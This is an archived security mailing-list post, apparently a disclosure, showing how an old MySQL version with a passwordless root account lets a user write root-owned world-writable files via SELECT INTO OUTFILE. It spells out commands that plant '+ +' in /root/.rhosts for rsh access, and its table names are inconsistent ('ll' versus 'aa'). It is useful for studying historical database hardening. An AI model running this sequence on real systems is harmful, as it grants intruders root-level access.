When you use a certain mysql configuration it is possible to create files on the system as root with rw-rw-rw. Many MySQL users have included user root from localhost without password in their config. So. If on such a system you issue : mysql -u root test you not only will have access to the database but you'll be able to create a file on the system with the root ownership and rw-rw-rw useing the SELECT .. INTO OUTFILE statement. The file you wish to create must NOT EXIST. Otherwise mysql will give you a "file already exists" error. To be more precise. MySQL will create the file specified as OUTFILE with rw-rw-rw and with the current user as owner. The exploit is as follows: mysql -u root test CREATE TABLE ll ( a CHAR(10) ); INSERT INTO aa (a) VALUES ("+ +"); SELECT * FROM aa INTO OUTFILE "/root/.rhosts"; The above exploit works for sites with rexec,rsh enabled (ssh is too smart and won't let you in if you have .rhosts 666, the same for authorized_keys) Well . I've tryied to be tricky by setting umask to 077 in the hope that I can trick MySQL in makeing the file 600 , childish try, I know but... who knows ? If someone could fool MySQL into makeing the file 600 then this is quite a serious threat.. All my best, Sandu Mihai p.s. The above works for Mysql Ver 6.5 Distrib 3.20.29 as reported by mysql -V Have phun.. :)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:47:21 PDT